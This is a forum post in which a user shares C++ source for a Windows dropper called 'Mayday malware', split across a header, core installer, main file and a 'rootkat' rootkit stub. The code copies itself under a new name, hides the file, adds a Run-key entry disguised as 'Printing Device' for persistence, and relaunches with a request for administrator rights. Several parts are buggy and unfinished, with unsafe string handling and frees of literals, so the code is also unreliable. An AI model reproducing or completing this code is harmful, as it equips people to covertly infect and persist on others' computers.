Jump to content
Jako

Mayday malware

By Jako, in Programare

Recommended Posts

Jako Newbie

Jako

Posted
Posted

main.h 

#pragma once
#ifndef HEADER_H
#define HEADER_H

#include <tchar.h>
#include <stdio.h>
#include <iostream>
#include <WinSock2.h>
#include <Windows.h>
#include <direct.h>
#include <string>
#pragma comment(lib, "Ws2_32.lib")

void mainInstaller(std::string filepath, std::string whatDropName);
bool isRunning(LPCSTR pName);
std::string ExtractFilename ( const std::string& path );
std::string ExtractDirectory ( const std::string& path );
void hideProcess();

#endif

maydaycore.cpp 

#include "Main.h"
#include <Psapi.h>
#include <TlHelp32.h>
#include <cstringt.h>
#include <atlstr.h>
#include <locale>
#include <codecvt>

using namespace std;

void mainInstaller(std::string filepath, std::string whatDropName)
{
    char nxs[] = "";
    strcat(nxs, (char *)whatDropName.c_str());
    std::string asdf = filepath + "_temp.exe";
    std::wstring stemp = std::wstring(filepath.begin(), filepath.end());
    std::wstring stempa = std::wstring(asdf.begin(), asdf.end());

    CopyFileW(stemp.c_str(), stempa.c_str(), FALSE);

    const std::string& nfn = ExtractFilename(filepath);
    const std::string& ofn = ExtractFilename(filepath);
    strcat((char *)nfn.c_str(), "_temp.exe");
    char old[] = "";
    strcat(old, (const char *)nfn.c_str());
    Sleep(500);
    int result;
    result = rename(old, nxs);

    if(result != 0)
    {
        std::cout << "Rename failure." << std::endl;
    }
    else
    {
        std::cout << "Rename success." << std::endl;
    }
    Sleep(500);
    std::cout << nxs << std::endl;
    if(!SetFileAttributesA((LPCSTR)nxs, FILE_ATTRIBUTE_HIDDEN))
    {
        std::cout << "Error hiding file." << std::endl;
    }
    Sleep(500);
    char szFinal[] = "";
        strcat(szFinal, (const char *)ExtractDirectory(filepath).c_str());
        strcat(szFinal, nxs);
        
        HKEY newValue;
        if(RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), &newValue) != ERROR_SUCCESS)
        {
        }

        wstring_convert<std::codecvt_utf8<wchar_t>> converter;
        CString str;
        str = szFinal;
        cout << str.GetString() << endl;
        const BYTE* pb = reinterpret_cast<const BYTE*>(str.GetString());
        cout << pb << endl;
        DWORD pathLenInBytes = *str * sizeof(*str);
        if(RegSetValueEx(newValue, TEXT("Printing Device"), 0, REG_SZ, (LPBYTE)pb, pathLenInBytes) != ERROR_SUCCESS)
        {
            RegCloseKey(newValue);
            cout << "error" << endl;
        } else {
            cout << "Possibly worked." << endl;
            RegCloseKey(newValue);
        }
        Sleep(800);
        char *fullNewFilePath = (char *)ExtractDirectory(filepath).c_str();
        strcat(fullNewFilePath, "\\");
        strcat(fullNewFilePath, whatDropName.c_str());
        char *cmd = "/k start ";
        strcat((char *)cmd, ExtractDirectory(filepath).c_str());
        strcat((char *)cmd, whatDropName.c_str());

        std::cout << cmd << std::endl;

        CString cmd_str = cmd;

        wchar_t wtext[20];
        mbstowcs(wtext, cmd, strlen(cmd) + 1);
        LPCWSTR newtext = wtext; // renders useless


        SHELLEXECUTEINFO shExecInfo;
        shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);
        shExecInfo.fMask = NULL;
        shExecInfo.hwnd = NULL;
        shExecInfo.lpVerb = L"runas"; // request admin permissions
        shExecInfo.lpFile = L"cmd.exe";
        shExecInfo.lpParameters = cmd_str;
        shExecInfo.lpDirectory = NULL;
        shExecInfo.nShow = SW_NORMAL;
        shExecInfo.hInstApp = NULL;

        ShellExecuteEx(&shExecInfo);

        ExitProcess(0);
}
void hideProcess()
{
    
}
std::string ExtractDirectory ( const std::string& path )
{
    return path.substr(0, path.find_last_of('\\') + 1);
}
std::string ExtractFilename ( const std::string& path )
{
    return path.substr(path.find_last_of('\\') + 1);
}
bool isRunning(LPCSTR pName)
{
    HWND hwnd;
    hwnd = FindWindow(NULL, (LPCWSTR)pName);
    if(hwnd!= 0)
    {
        return true;
    }
    else
    {
        return false;
    }
}

maydaymalware.cpp 

#include "Main.h"

char *fileToDrop = "mayday.exe";
char *filepath = "";
char *reachServer = "127.0.0.1";
char *reachDirectory = "mayday";

int main(int argc, char *argv[])
{
    filepath = argv[0];
    if(ExtractFilename(filepath).c_str() != (std::string)fileToDrop) {
        mainInstaller(filepath, fileToDrop);
        free(filepath);
        free(fileToDrop);
    } else {
        while(true)
        {
            Sleep(100000);
        }
    }
    return 0;
}

rootkat.cpp 

#include "Main.h"
#include <CommCtrl.h>

#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/FILEALIGN:512 /MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR /IGNORE:4078")
#define WIN32_LEAN_AND_MEAN
#define MAX 256

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...